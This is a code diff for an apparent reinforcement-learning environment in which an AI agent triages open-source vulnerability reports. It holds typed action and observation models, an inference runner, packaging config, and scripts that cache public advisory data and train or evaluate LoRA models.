| 170 |
+
{"role": "system", "content": SYSTEM_PROMPT},
|
| 171 |
+
{
|
| 172 |
+
"role": "user",
|
| 173 |
+
"content": json.dumps(observation, indent=2, sort_keys=True),
|
| 174 |
+
},
|
| 175 |
+
],
|
| 176 |
+
)
|
| 177 |
+
text = response.choices[0].message.content
|
| 178 |
+
return parse_json_response(text)
|
| 179 |
+
|
| 180 |
+
|
| 181 |
+
_VALID_ACTION_KEYS = {"action_type", "evidence_id", "value", "rationale"}
|
| 182 |
+
|
| 183 |
+
|
| 184 |
+
def sanitize_action_payload(payload: Dict) -> Dict:
|
| 185 |
+
"""Keep only valid VulnTriageAction keys and coerce bad value types."""
|
| 186 |
+
clean = {k: v for k, v in payload.items() if k in _VALID_ACTION_KEYS}
|
| 187 |
+
if isinstance(clean.get("value"), (dict, list)):
|
| 188 |
+
clean["value"] = json.dumps(clean["value"])
|
| 189 |
+
return clean
|
| 190 |
+
|
| 191 |
+
|
| 192 |
+
def run_local_episode(task_id: str, policy: str, model_name: str) -> Dict[str, float]:
|
| 193 |
+
print(f"START")
|
| 194 |
+
print(f"Task: {task_id}")
|
| 195 |
+
env = VulnTriageEnvironment()
|
| 196 |
+
observation = env.reset(task_id=task_id).model_dump()
|
| 197 |
+
client = get_openai_client() if policy == "openai" else None
|
| 198 |
+
last_action_str: str = ""
|
| 199 |
+
repeat_count: int = 0
|
| 200 |
+
step_num: int = 1
|
| 201 |
+
|
| 202 |
+
while not observation["done"]:
|
| 203 |
+
print(f"STEP")
|
| 204 |
+
action_payload = (
|
| 205 |
+
llm_policy(client, model_name, observation) if client else heuristic_policy(observation)
|
| 206 |
+
)
|
| 207 |
+
# Strip unknown keys then coerce bad value types
|
| 208 |
+
try:
|
| 209 |
+
clean = sanitize_action_payload(action_payload)
|
| 210 |
+
action = VulnTriageAction.model_validate(clean)
|
| 211 |
+
except Exception as exc:
|
| 212 |
+
print(f" [warn] invalid action payload ({exc}), falling back to read_report")
|
| 213 |
+
action = VulnTriageAction(action_type="read_report", rationale="fallback: parse error")
|
| 214 |
+
|
| 215 |
+
# Break infinite loops where model repeats the same action
|
| 216 |
+
action_str = action.model_dump_json()
|
| 217 |
+
if action_str == last_action_str:
|
| 218 |
+
repeat_count += 1
|
| 219 |
+
if repeat_count >= 3:
|
| 220 |
+
print(f" [warn] model repeated same action 3x — forcing submit_triage")
|
| 221 |
+
action = VulnTriageAction(action_type="submit_triage", rationale="loop guard")
|
| 222 |
+
else:
|
| 223 |
+
repeat_count = 0
|
| 224 |
+
last_action_str = action_str
|
| 225 |
+
|
| 226 |
+
print(f"Action: {action.action_type}")
|
| 227 |
+
observation = env.step(action).model_dump()
|
| 228 |
+
step_num += 1
|
| 229 |
+
|
| 230 |
+
print(f"END")
|
| 231 |
+
|
| 232 |
+
return {
|
| 233 |
+
"task_id": task_id,
|
| 234 |
+
"final_score": float(observation["final_score"] or 0.0),
|
| 235 |
+
"validity": observation["score_breakdown"]["validity"],
|
| 236 |
+
"package_versions": round(
|
| 237 |
+
(
|
| 238 |
+
observation["score_breakdown"]["affected_package"]
|
| 239 |
+
+ observation["score_breakdown"]["affected_versions"]
|
| 240 |
+
)
|
| 241 |
+
/ 2,
|
| 242 |
+
4,
|
| 243 |
+
),
|
| 244 |
+
"severity": observation["score_breakdown"]["severity"],
|
| 245 |
+
"exploitability": observation["score_breakdown"]["exploitability"],
|
| 246 |
+
"next_action": observation["score_breakdown"]["next_action"],
|
| 247 |
+
}
|
| 248 |
+
|
| 249 |
+
|
| 250 |
+
def run_remote_episode(base_url: str, task_id: str, policy: str, model_name: str) -> Dict[str, float]:
|
| 251 |
+
print(f"START")
|
| 252 |
+
print(f"Task: {task_id}")
|
| 253 |
+
llm_client = get_openai_client() if policy == "openai" else None
|
| 254 |
+
env = GenericEnvClient(base_url=base_url).sync()
|
| 255 |
+
with env:
|
| 256 |
+
response = env.reset(task_id=task_id)
|
| 257 |
+
observation = response.observation
|
| 258 |
+
done = response.done
|
| 259 |
+
step_num: int = 1
|
| 260 |
+
while not done:
|
| 261 |
+
print(f"STEP")
|
| 262 |
+
action_payload = (
|
| 263 |
+
llm_policy(llm_client, model_name, observation)
|
| 264 |
+
if llm_client
|
| 265 |
+
else heuristic_policy(observation)
|
| 266 |
+
)
|
| 267 |
+
print(f"Action: {action_payload.get('action_type')}")
|
| 268 |
+
response = env.step(action_payload)
|
| 269 |
+
observation = response.observation
|
| 270 |
+
done = response.done
|
| 271 |
+
step_num += 1
|
| 272 |
+
|
| 273 |
+
print(f"END")
|
| 274 |
+
|
| 275 |
+
final_score = float(observation.get("final_score") or 0.0)
|
| 276 |
+
return {
|
| 277 |
+
"task_id": task_id,
|
| 278 |
+
"final_score": final_score,
|
| 279 |
+
"validity": observation["score_breakdown"]["validity"],
|
| 280 |
+
"package_versions": round(
|
| 281 |
+
(
|
| 282 |
+
observation["score_breakdown"]["affected_package"]
|
| 283 |
+
+ observation["score_breakdown"]["affected_versions"]
|
| 284 |
+
)
|
| 285 |
+
/ 2,
|
| 286 |
+
4,
|
| 287 |
+
),
|
| 288 |
+
"severity": observation["score_breakdown"]["severity"],
|
| 289 |
+
"exploitability": observation["score_breakdown"]["exploitability"],
|
| 290 |
+
"next_action": observation["score_breakdown"]["next_action"],
|
| 291 |
+
}
|
| 292 |
+
|
| 293 |
+
|
| 294 |
+
def main() -> None:
|
| 295 |
+
parser = argparse.ArgumentParser()
|
| 296 |
+
parser.add_argument("--policy", choices=["openai", "heuristic"], default="heuristic")
|
| 297 |
+
parser.add_argument("--model", default=MODEL_NAME)
|
| 298 |
+
parser.add_argument("--env-base-url", dest="base_url", default=os.getenv("ENV_BASE_URL"))
|
| 299 |
+
args = parser.parse_args()
|
| 300 |
+
|
| 301 |
+
results: List[Dict[str, float]] = []
|
| 302 |
+
for task_id in TASK_ORDER:
|
| 303 |
+
if args.base_url:
|
| 304 |
+
results.append(run_remote_episode(args.base_url, task_id, args.policy, args.model))
|
| 305 |
+
else:
|
| 306 |
+
results.append(run_local_episode(task_id, args.policy, args.model))
|
| 307 |
+
|
| 308 |
+
aggregate = round(sum(item["final_score"] for item in results) / len(results), 4)
|
| 309 |
+
print(json.dumps({"policy": args.policy, "model": args.model, "average_score": aggregate, "tasks": results}, indent=2))
|
| 310 |
+
|
| 311 |
+
|
| 312 |
+
if __name__ == "__main__":
|
| 313 |
+
main()
|
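A quick sanity check of parse_json_response on the output shapes it is written to handle. The strings are illustrative, and the import assumes you run from the repo root with the dependencies installed:

from inference import parse_json_response

# Think block plus fenced JSON, as emitted by reasoning models.
raw = (
    "<think>scratch work</think>\n"
    "```json\n"
    '{"action_type": "read_report", "rationale": "start"}\n'
    "```"
)
print(parse_json_response(raw))
# -> {'action_type': 'read_report', 'rationale': 'start'}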
models.py
ADDED
@@ -0,0 +1,144 @@
"""Typed models for the vulnerability triage environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
from typing import Dict, List, Literal, Optional
|
| 6 |
+
|
| 7 |
+
from openenv.core.env_server.types import Action, Observation, State
|
| 8 |
+
from pydantic import BaseModel, Field
|
| 9 |
+
|
| 10 |
+
|
| 11 |
+
ActionType = Literal[
|
| 12 |
+
"read_report",
|
| 13 |
+
"inspect_evidence",
|
| 14 |
+
"search_nvd_database",
|
| 15 |
+
"fetch_commit_diff",
|
| 16 |
+
"message_maintainer",
|
| 17 |
+
"set_validity",
|
| 18 |
+
"set_affected_package",
|
| 19 |
+
"set_affected_versions",
|
| 20 |
+
"set_severity",
|
| 21 |
+
"set_exploitability",
|
| 22 |
+
"set_next_action",
|
| 23 |
+
"set_missing_information",
|
| 24 |
+
"request_more_info",
|
| 25 |
+
"submit_triage",
|
| 26 |
+
]
|
| 27 |
+
|
| 28 |
+
ValidityLabel = Literal["unknown", "valid", "invalid", "needs_more_info"]
|
| 29 |
+
SeverityLabel = Literal["unknown", "low", "medium", "high", "critical"]
|
| 30 |
+
ExploitabilityLabel = Literal["unknown", "low", "medium", "high"]
|
| 31 |
+
NextActionLabel = Literal[
|
| 32 |
+
"unknown",
|
| 33 |
+
"request_info",
|
| 34 |
+
"close",
|
| 35 |
+
"escalate",
|
| 36 |
+
"patch",
|
| 37 |
+
"publish_advisory",
|
| 38 |
+
]
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
class EvidenceItem(BaseModel):
|
| 42 |
+
"""Evidence the agent can reveal during triage."""
|
| 43 |
+
|
| 44 |
+
evidence_id: str = Field(..., description="Unique identifier for this evidence item")
|
| 45 |
+
title: str = Field(..., description="Short evidence title")
|
| 46 |
+
summary: str = Field(..., description="Evidence content shown to the agent")
|
| 47 |
+
kind: str = Field(..., description="Evidence type such as advisory or patch note")
|
| 48 |
+
|
| 49 |
+
|
| 50 |
+
class TriageDraft(BaseModel):
|
| 51 |
+
"""Agent-managed triage state."""
|
| 52 |
+
|
| 53 |
+
validity: ValidityLabel = "unknown"
|
| 54 |
+
affected_package: str = ""
|
| 55 |
+
affected_versions: str = ""
|
| 56 |
+
severity: SeverityLabel = "unknown"
|
| 57 |
+
exploitability: ExploitabilityLabel = "unknown"
|
| 58 |
+
next_action: NextActionLabel = "unknown"
|
| 59 |
+
missing_information: List[str] = Field(default_factory=list)
|
| 60 |
+
|
| 61 |
+
|
| 62 |
+
class VulnTriageAction(Action):
|
| 63 |
+
"""Structured action space for vulnerability triage."""
|
| 64 |
+
|
| 65 |
+
action_type: ActionType = Field(..., description="Which environment action to execute")
|
| 66 |
+
evidence_id: Optional[str] = Field(
|
| 67 |
+
default=None,
|
| 68 |
+
description="Evidence identifier used by inspect_evidence",
|
| 69 |
+
)
|
| 70 |
+
value: Optional[str] = Field(
|
| 71 |
+
default=None,
|
| 72 |
+
description="Generic value used for label-setting actions",
|
| 73 |
+
)
|
| 74 |
+
rationale: str = Field(
|
| 75 |
+
default="",
|
| 76 |
+
description="Optional short rationale for debugging and trajectory inspection",
|
| 77 |
+
)
|
| 78 |
+
|
| 79 |
+
|
| 80 |
+
class VulnTriageObservation(Observation):
|
| 81 |
+
"""Observation returned after every environment transition."""
|
| 82 |
+
|
| 83 |
+
task_id: str = Field(..., description="Current task identifier")
|
| 84 |
+
difficulty: str = Field(..., description="Difficulty band for the current task")
|
| 85 |
+
objective: str = Field(..., description="Concrete task objective")
|
| 86 |
+
report_summary: str = Field(..., description="Incoming vulnerability report summary")
|
| 87 |
+
visible_evidence: List[EvidenceItem] = Field(
|
| 88 |
+
default_factory=list,
|
| 89 |
+
description="Evidence items currently visible to the agent",
|
| 90 |
+
)
|
| 91 |
+
available_evidence: List[str] = Field(
|
| 92 |
+
default_factory=list,
|
| 93 |
+
description="Evidence identifiers available to inspect next",
|
| 94 |
+
)
|
| 95 |
+
draft: TriageDraft = Field(
|
| 96 |
+
default_factory=TriageDraft,
|
| 97 |
+
description="Current structured triage draft",
|
| 98 |
+
)
|
| 99 |
+
action_history: List[str] = Field(
|
| 100 |
+
default_factory=list,
|
| 101 |
+
description="Compact history of recent agent actions",
|
| 102 |
+
)
|
| 103 |
+
steps_remaining: int = Field(..., ge=0, description="Remaining steps in the episode")
|
| 104 |
+
score_breakdown: Dict[str, float] = Field(
|
| 105 |
+
default_factory=dict,
|
| 106 |
+
description="Current normalized grader breakdown",
|
| 107 |
+
)
|
| 108 |
+
final_score: Optional[float] = Field(
|
| 109 |
+
default=None,
|
| 110 |
+
description="Final submission score when the episode is done",
|
| 111 |
+
)
|
| 112 |
+
available_actions: List[str] = Field(
|
| 113 |
+
default_factory=lambda: [
|
| 114 |
+
"read_report",
|
| 115 |
+
"inspect_evidence",
|
| 116 |
+
"search_nvd_database",
|
| 117 |
+
"fetch_commit_diff",
|
| 118 |
+
"message_maintainer",
|
| 119 |
+
"set_validity",
|
| 120 |
+
"set_affected_package",
|
| 121 |
+
"set_affected_versions",
|
| 122 |
+
"set_severity",
|
| 123 |
+
"set_exploitability",
|
| 124 |
+
"set_next_action",
|
| 125 |
+
"set_missing_information",
|
| 126 |
+
"request_more_info",
|
| 127 |
+
"submit_triage",
|
| 128 |
+
],
|
| 129 |
+
description="Action names the agent can choose from",
|
| 130 |
+
)
|
| 131 |
+
|
| 132 |
+
|
| 133 |
+
class VulnTriageState(State):
|
| 134 |
+
"""Serializable environment state for inspection and debugging."""
|
| 135 |
+
|
| 136 |
+
task_id: str = Field(..., description="Current task identifier")
|
| 137 |
+
difficulty: str = Field(..., description="Difficulty band")
|
| 138 |
+
draft: TriageDraft = Field(default_factory=TriageDraft)
|
| 139 |
+
revealed_evidence_ids: List[str] = Field(default_factory=list)
|
| 140 |
+
action_history: List[str] = Field(default_factory=list)
|
| 141 |
+
steps_remaining: int = Field(..., ge=0)
|
| 142 |
+
submitted: bool = Field(default=False)
|
| 143 |
+
final_score: Optional[float] = Field(default=None)
|
| 144 |
+
score_breakdown: Dict[str, float] = Field(default_factory=dict)
|
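Because action_type is a Literal, out-of-vocabulary actions fail at validation time rather than inside the environment. A small sketch, assuming the openenv Action base class adds no required fields of its own:

from pydantic import ValidationError

from models import VulnTriageAction

action = VulnTriageAction(action_type="set_severity", value="high", rationale="CVSS base score 8.1")
print(action.model_dump_json(exclude_none=True))

try:
    VulnTriageAction(action_type="delete_report")  # not in the ActionType Literal
except ValidationError as exc:
    print("rejected:", exc.error_count(), "error(s)")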
openenv.yaml
ADDED
@@ -0,0 +1,6 @@
spec_version: 1
name: vulnops
type: space
runtime: fastapi
app: server.app:app
port: 7860
pyproject.toml
ADDED
@@ -0,0 +1,29 @@
[build-system]
requires = ["setuptools>=45", "wheel"]
build-backend = "setuptools.build_meta"

[project]
name = "openenv-vulnops"
version = "0.1.0"
description = "Deterministic OpenEnv benchmark for open-source vulnerability operations"
readme = "README.md"
requires-python = ">=3.10"
dependencies = [
    "openenv-core[core]>=0.2.3",
]

[project.optional-dependencies]
dev = [
    "pytest>=8.0.0",
]
train = [
    "peft>=0.14.0",
]

[project.scripts]
server = "vulnops.server.app:main"

[tool.setuptools]
include-package-data = true
packages = ["vulnops", "vulnops.server"]
package-dir = { "vulnops" = ".", "vulnops.server" = "server" }
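The package-dir mapping installs the repo root as the vulnops package, so the flat top-level modules become importable under that namespace. A sketch, assuming an editable install succeeded:

# After `pip install -e .` from the repo root:
from vulnops.models import VulnTriageAction  # models.py at the repo root
from vulnops.server import cases             # server/cases.py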
scripts/build_snapshot_cache.py
ADDED
@@ -0,0 +1,139 @@
"""Build a provider-backed fallback snapshot cache."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import json
|
| 6 |
+
from pathlib import Path
|
| 7 |
+
import sys
|
| 8 |
+
from concurrent.futures import ThreadPoolExecutor, as_completed
|
| 9 |
+
from typing import Dict, List
|
| 10 |
+
|
| 11 |
+
import requests
|
| 12 |
+
|
| 13 |
+
ROOT = Path(__file__).resolve().parent.parent
|
| 14 |
+
if str(ROOT) not in sys.path:
|
| 15 |
+
sys.path.insert(0, str(ROOT))
|
| 16 |
+
|
| 17 |
+
from server.cases import EPSS_URL, NVD_CVE_URL, OSV_VULN_URL, _extract_cve_id
|
| 18 |
+
|
| 19 |
+
SNAPSHOT_DIR = ROOT / "data" / "snapshots"
|
| 20 |
+
INDEX_PATH = ROOT / "data" / "snapshot_index.json"
|
| 21 |
+
PYPA_TREE_URL = "https://api.github.com/repos/pypa/advisory-database/git/trees/main?recursive=1"
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
def get_candidate_ids(limit: int = 200) -> List[str]:
|
| 25 |
+
response = requests.get(PYPA_TREE_URL, timeout=30)
|
| 26 |
+
response.raise_for_status()
|
| 27 |
+
tree = response.json().get("tree", [])
|
| 28 |
+
ids = []
|
| 29 |
+
for item in tree:
|
| 30 |
+
path = item.get("path", "")
|
| 31 |
+
if not path.startswith("vulns/") or not path.endswith(".yaml"):
|
| 32 |
+
continue
|
| 33 |
+
ident = path.rsplit("/", 1)[-1][:-5]
|
| 34 |
+
if ident.startswith(("PYSEC-", "GHSA-")):
|
| 35 |
+
ids.append(ident)
|
| 36 |
+
return ids[: limit * 4]
|
| 37 |
+
|
| 38 |
+
|
| 39 |
+
def fetch_json(url: str, *, params: Dict[str, str] | None = None) -> Dict:
|
| 40 |
+
response = requests.get(url, params=params, timeout=20)
|
| 41 |
+
response.raise_for_status()
|
| 42 |
+
return response.json()
|
| 43 |
+
|
| 44 |
+
|
| 45 |
+
def build_snapshot(osv_id: str) -> Dict | None:
|
| 46 |
+
osv = fetch_json(OSV_VULN_URL.format(osv_id=osv_id))
|
| 47 |
+
if not osv.get("affected"):
|
| 48 |
+
return None
|
| 49 |
+
|
| 50 |
+
cve_id = _extract_cve_id(osv)
|
| 51 |
+
snapshot = {
|
| 52 |
+
"id": osv.get("id"),
|
| 53 |
+
"summary": osv.get("summary"),
|
| 54 |
+
"details": osv.get("details"),
|
| 55 |
+
"aliases": osv.get("aliases", []),
|
| 56 |
+
"references": osv.get("references", []),
|
| 57 |
+
"affected": osv.get("affected", []),
|
| 58 |
+
"severity": "MEDIUM",
|
| 59 |
+
"nvd_description": "",
|
| 60 |
+
"epss_score": 0.0,
|
| 61 |
+
"epss_percentile": 0.0,
|
| 62 |
+
}
|
| 63 |
+
|
| 64 |
+
if cve_id:
|
| 65 |
+
try:
|
| 66 |
+
nvd = fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
|
| 67 |
+
vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
|
| 68 |
+
metrics = vulnerability.get("metrics", {})
|
| 69 |
+
severity = None
|
| 70 |
+
for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
|
| 71 |
+
if key in metrics:
|
| 72 |
+
item = metrics[key][0]
|
| 73 |
+
severity = (
|
| 74 |
+
item.get("cvssData", {}).get("baseSeverity")
|
| 75 |
+
or item.get("baseSeverity")
|
| 76 |
+
)
|
| 77 |
+
if severity:
|
| 78 |
+
break
|
| 79 |
+
descriptions = vulnerability.get("descriptions", [])
|
| 80 |
+
snapshot["severity"] = severity or snapshot["severity"]
|
| 81 |
+
snapshot["nvd_description"] = next(
|
| 82 |
+
(
|
| 83 |
+
desc.get("value", "")
|
| 84 |
+
for desc in descriptions
|
| 85 |
+
if desc.get("lang") == "en"
|
| 86 |
+
),
|
| 87 |
+
descriptions[0].get("value", "") if descriptions else "",
|
| 88 |
+
)
|
| 89 |
+
except Exception:
|
| 90 |
+
pass
|
| 91 |
+
|
| 92 |
+
try:
|
| 93 |
+
epss = fetch_json(EPSS_URL, params={"cve": cve_id})
|
| 94 |
+
item = (epss.get("data") or [{}])[0]
|
| 95 |
+
snapshot["epss_score"] = float(item.get("epss", 0.0) or 0.0)
|
| 96 |
+
snapshot["epss_percentile"] = float(item.get("percentile", 0.0) or 0.0)
|
| 97 |
+
except Exception:
|
| 98 |
+
pass
|
| 99 |
+
|
| 100 |
+
return snapshot
|
| 101 |
+
|
| 102 |
+
|
| 103 |
+
def main(target_count: int = 200) -> None:
|
| 104 |
+
SNAPSHOT_DIR.mkdir(parents=True, exist_ok=True)
|
| 105 |
+
candidates = get_candidate_ids(target_count)[: max(target_count + 40, 240)]
|
| 106 |
+
saved = []
|
| 107 |
+
|
| 108 |
+
with ThreadPoolExecutor(max_workers=12) as executor:
|
| 109 |
+
futures = {executor.submit(build_snapshot, osv_id): osv_id for osv_id in candidates}
|
| 110 |
+
for future in as_completed(futures):
|
| 111 |
+
if len(saved) >= target_count:
|
| 112 |
+
executor.shutdown(wait=False, cancel_futures=True)
|
| 113 |
+
break
|
| 114 |
+
osv_id = futures[future]
|
| 115 |
+
try:
|
| 116 |
+
snapshot = future.result()
|
| 117 |
+
except Exception:
|
| 118 |
+
continue
|
| 119 |
+
if not snapshot:
|
| 120 |
+
continue
|
| 121 |
+
out_path = SNAPSHOT_DIR / f"{osv_id}.json"
|
| 122 |
+
out_path.write_text(json.dumps(snapshot, indent=2, sort_keys=True))
|
| 123 |
+
saved.append(
|
| 124 |
+
{
|
| 125 |
+
"osv_id": osv_id,
|
| 126 |
+
"file": str(out_path.relative_to(ROOT)),
|
| 127 |
+
"cve_id": _extract_cve_id(snapshot),
|
| 128 |
+
"package": (snapshot.get("affected") or [{}])[0].get("package", {}).get("name", ""),
|
| 129 |
+
}
|
| 130 |
+
)
|
| 131 |
+
|
| 132 |
+
INDEX_PATH.parent.mkdir(parents=True, exist_ok=True)
|
| 133 |
+
saved = sorted(saved, key=lambda item: item["osv_id"])
|
| 134 |
+
INDEX_PATH.write_text(json.dumps({"count": len(saved), "snapshots": saved}, indent=2))
|
| 135 |
+
print(f"Saved {len(saved)} snapshots to {SNAPSHOT_DIR}")
|
| 136 |
+
|
| 137 |
+
|
| 138 |
+
if __name__ == "__main__":
|
| 139 |
+
main()
|
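build_snapshot can also be exercised for a single advisory. A sketch: it needs network access, and the scripts directory must be importable (e.g. run from the repo root with scripts on sys.path):

from scripts.build_snapshot_cache import build_snapshot

# One OSV id from the index above. Severity falls back to "MEDIUM" and the
# EPSS fields stay 0.0 whenever the NVD/EPSS lookups fail.
snapshot = build_snapshot("PYSEC-2024-24")
if snapshot:
    print(snapshot["id"], snapshot["severity"], snapshot["epss_score"])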
scripts/compare_training_speeds.py
ADDED
@@ -0,0 +1,38 @@
"""Compare saved PyTorch and MLX speed summaries."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import json
|
| 6 |
+
from pathlib import Path
|
| 7 |
+
|
| 8 |
+
|
| 9 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 10 |
+
PT_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "metrics" / "speed_baseline_pytorch.json"
|
| 11 |
+
MLX_PATH = ROOT / "artifacts" / "mlx_qwen3_4b" / "metrics" / "speed_mlx.json"
|
| 12 |
+
OUT_PATH = ROOT / "artifacts" / "speed_comparison.json"
|
| 13 |
+
|
| 14 |
+
|
| 15 |
+
def load(path: Path) -> dict:
|
| 16 |
+
return json.loads(path.read_text(encoding="utf-8"))
|
| 17 |
+
|
| 18 |
+
|
| 19 |
+
def main() -> None:
|
| 20 |
+
pt = load(PT_PATH)
|
| 21 |
+
mlx = load(MLX_PATH)
|
| 22 |
+
pt_s = pt.get("latest_seconds_per_step")
|
| 23 |
+
mlx_s = mlx.get("latest_seconds_per_step")
|
| 24 |
+
payload = {
|
| 25 |
+
"pytorch_mps_seconds_per_step": pt_s,
|
| 26 |
+
"mlx_seconds_per_step": mlx_s,
|
| 27 |
+
"speedup_factor_mlx_vs_pytorch": (pt_s / mlx_s) if pt_s and mlx_s else None,
|
| 28 |
+
"notes": [
|
| 29 |
+
"PyTorch baseline uses the existing PEFT/Transformers trainer on MPS.",
|
| 30 |
+
"MLX benchmark uses a lower-memory LoRA config: 8 layers and max_seq_length 1024.",
|
| 31 |
+
],
|
| 32 |
+
}
|
| 33 |
+
OUT_PATH.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 34 |
+
print(json.dumps(payload, indent=2, sort_keys=True))
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
if __name__ == "__main__":
|
| 38 |
+
main()
|
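The comparison reduces to a single ratio of seconds-per-step readings. A worked example with hypothetical numbers:

# Hypothetical readings; real values come from the two metrics JSON files.
pt_s, mlx_s = 2.4, 0.8
print(f"speedup_factor_mlx_vs_pytorch: {pt_s / mlx_s:.1f}x")  # 3.0x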
scripts/dump_mlx_generation.py
ADDED
@@ -0,0 +1,63 @@
"""Dump a full raw generation from the MLX model for one vulnops observation."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import sys
|
| 8 |
+
from pathlib import Path
|
| 9 |
+
|
| 10 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 11 |
+
if str(ROOT) not in sys.path:
|
| 12 |
+
sys.path.insert(0, str(ROOT))
|
| 13 |
+
|
| 14 |
+
from mlx_lm import generate, load
|
| 15 |
+
from mlx_lm.sample_utils import make_sampler
|
| 16 |
+
|
| 17 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 18 |
+
from training_utils import render_prompt
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
def main() -> None:
|
| 22 |
+
parser = argparse.ArgumentParser()
|
| 23 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 24 |
+
parser.add_argument("--adapter-path", default="artifacts/mlx_qwen3_4b/adapters")
|
| 25 |
+
parser.add_argument("--task-id", default="task_easy_guarddog")
|
| 26 |
+
parser.add_argument("--max-tokens", type=int, default=2048)
|
| 27 |
+
parser.add_argument(
|
| 28 |
+
"--output-file",
|
| 29 |
+
default="artifacts/mlx_qwen3_4b/inspection/task_easy_guarddog_latest_raw_output.json",
|
| 30 |
+
)
|
| 31 |
+
args = parser.parse_args()
|
| 32 |
+
|
| 33 |
+
model, tokenizer = load(args.model, adapter_path=args.adapter_path)
|
| 34 |
+
env = VulnTriageEnvironment()
|
| 35 |
+
observation = env.reset(task_id=args.task_id).model_dump()
|
| 36 |
+
prompt = render_prompt(observation, "Return only the best next action in JSON.")
|
| 37 |
+
raw_output = generate(
|
| 38 |
+
model,
|
| 39 |
+
tokenizer,
|
| 40 |
+
prompt=prompt,
|
| 41 |
+
verbose=False,
|
| 42 |
+
max_tokens=args.max_tokens,
|
| 43 |
+
sampler=make_sampler(temp=0.0),
|
| 44 |
+
)
|
| 45 |
+
|
| 46 |
+
output_path = Path(args.output_file)
|
| 47 |
+
if not output_path.is_absolute():
|
| 48 |
+
output_path = (ROOT / output_path).resolve()
|
| 49 |
+
output_path.parent.mkdir(parents=True, exist_ok=True)
|
| 50 |
+
payload = {
|
| 51 |
+
"task_id": args.task_id,
|
| 52 |
+
"model": args.model,
|
| 53 |
+
"adapter_path": args.adapter_path,
|
| 54 |
+
"max_tokens": args.max_tokens,
|
| 55 |
+
"prompt": prompt,
|
| 56 |
+
"raw_output": raw_output,
|
| 57 |
+
}
|
| 58 |
+
output_path.write_text(json.dumps(payload, indent=2) + "\n", encoding="utf-8")
|
| 59 |
+
print(output_path)
|
| 60 |
+
|
| 61 |
+
|
| 62 |
+
if __name__ == "__main__":
|
| 63 |
+
main()
|
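The dumped artifact is a flat JSON object, so inspecting a run afterwards is simple. A sketch using the script's default output path:

import json
from pathlib import Path

payload = json.loads(
    Path("artifacts/mlx_qwen3_4b/inspection/task_easy_guarddog_latest_raw_output.json").read_text(encoding="utf-8")
)
print(payload["task_id"], payload["max_tokens"])
print(payload["raw_output"][:200])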
scripts/evaluate_lora.py
ADDED
@@ -0,0 +1,133 @@
"""Evaluate a base or LoRA-adapted model on the local vulnops environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import sys
|
| 8 |
+
from pathlib import Path
|
| 9 |
+
from typing import Dict, List
|
| 10 |
+
|
| 11 |
+
import torch
|
| 12 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 13 |
+
|
| 14 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 15 |
+
if str(ROOT) not in sys.path:
|
| 16 |
+
sys.path.insert(0, str(ROOT))
|
| 17 |
+
|
| 18 |
+
from server.cases import TASK_ORDER
|
| 19 |
+
from training_utils import (
|
| 20 |
+
detect_device,
|
| 21 |
+
maybe_parse_action,
|
| 22 |
+
preferred_torch_dtype,
|
| 23 |
+
render_prompt,
|
| 24 |
+
set_default_env,
|
| 25 |
+
)
|
| 26 |
+
from models import VulnTriageAction
|
| 27 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 28 |
+
|
| 29 |
+
|
| 30 |
+
def load_model(model_name: str, adapter_path: str | None, output_root: Path):
|
| 31 |
+
set_default_env(output_root)
|
| 32 |
+
device = detect_device()
|
| 33 |
+
torch_dtype = preferred_torch_dtype(device)
|
| 34 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name, trust_remote_code=True)
|
| 35 |
+
if tokenizer.pad_token is None:
|
| 36 |
+
tokenizer.pad_token = tokenizer.eos_token
|
| 37 |
+
|
| 38 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 39 |
+
model_name,
|
| 40 |
+
torch_dtype=torch_dtype,
|
| 41 |
+
trust_remote_code=True,
|
| 42 |
+
low_cpu_mem_usage=True,
|
| 43 |
+
)
|
| 44 |
+
|
| 45 |
+
if adapter_path:
|
| 46 |
+
try:
|
| 47 |
+
from peft import PeftModel
|
| 48 |
+
except ImportError as exc:
|
| 49 |
+
raise RuntimeError("peft is required to evaluate a LoRA adapter.") from exc
|
| 50 |
+
model = PeftModel.from_pretrained(model, adapter_path)
|
| 51 |
+
|
| 52 |
+
if device in {"cuda", "mps"}:
|
| 53 |
+
model.to(device)
|
| 54 |
+
model.eval()
|
| 55 |
+
return model, tokenizer, device
|
| 56 |
+
|
| 57 |
+
|
| 58 |
+
@torch.inference_mode()
|
| 59 |
+
def next_action(model, tokenizer, device: str, observation: Dict[str, object]) -> Dict[str, object]:
|
| 60 |
+
prompt = render_prompt(
|
| 61 |
+
observation=observation,
|
| 62 |
+
prompt_variant="Return only the best next action in JSON.",
|
| 63 |
+
)
|
| 64 |
+
encoded = tokenizer(prompt, return_tensors="pt")
|
| 65 |
+
encoded = {key: value.to(device) for key, value in encoded.items()}
|
| 66 |
+
generated = model.generate(
|
| 67 |
+
**encoded,
|
| 68 |
+
max_new_tokens=192,
|
| 69 |
+
do_sample=False,
|
| 70 |
+
temperature=None,
|
| 71 |
+
pad_token_id=tokenizer.pad_token_id,
|
